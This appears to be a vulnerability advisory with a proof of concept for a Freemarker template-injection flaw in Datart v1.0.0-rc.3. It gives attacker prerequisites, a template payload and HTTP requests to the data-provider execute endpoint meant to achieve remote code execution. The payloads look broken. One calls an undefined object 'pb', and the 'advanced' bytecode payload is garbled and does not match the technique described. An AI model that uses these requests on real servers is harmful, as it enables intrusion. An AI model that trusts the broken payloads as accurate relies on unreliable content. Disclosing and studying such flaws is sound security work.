### Vulnerability Overview - **CVE ID:** CVE-2025-70830 - **Affected Product:** Datart - **Affected Version:** v1.0.0-rc.3 - **Vulnerability Type:** Server-Side Template Injection (SSTI) - **Severity Level:** Remote Code Execution (RCE) ### Vulnerability Description The Freemarker template engine in Datart version v1.0.0-rc.3 is vulnerable to Server-Side Template Injection (SSTI). An authenticated attacker can inject malicious Freemarker template syntax into the SQL script field to execute arbitrary system commands on the server. ### Proof of Concept #### 1. Prerequisites - Log in to the Datart system. - Access and edit a data source (Data Source) that supports SQL execution. #### 2. Payload Construction In the SQL script/query editor, input the following Freemarker payload to trigger system command execution (e.g., `id` or `calc`): ```freemarker ${pb.start()} SELECT 1 ``` Click "Execute Script" to trigger the command execution on the server. #### 3. HTTP Request Example The following HTTP request via API can trigger the vulnerability: ```http POST /api/v1/data-provider/execute/test HTTP/1.1 Host: target.com:8080 Content-Type: application/json Authorization: Bearer {VALID_TOKEN} { "sourceId": "valid_source_id", "script": "${pb.start()}SELECT 1", "scriptType": "SQL", "size": 100 } ``` ### Advanced Exploitation **Load Arbitrary Bytecode** Attackers can leverage Java’s `javax.script.ScriptEngineManager` to invoke the JavaScript engine and load and execute arbitrary Base64-encoded Java bytecode. **Payload Example:** ```http POST /api/v1/data-provider/execute/test HTTP/1.1 Host: target.com:8080 Content-Type: application/json Authorization: Bearer {VALID_TOKEN} { "script": "({Binding: GlobalObject})>()", "sourceId": "valid_source_id", "size": 1000, "scriptType": "SQL", "columns": "", "variables": [] } ```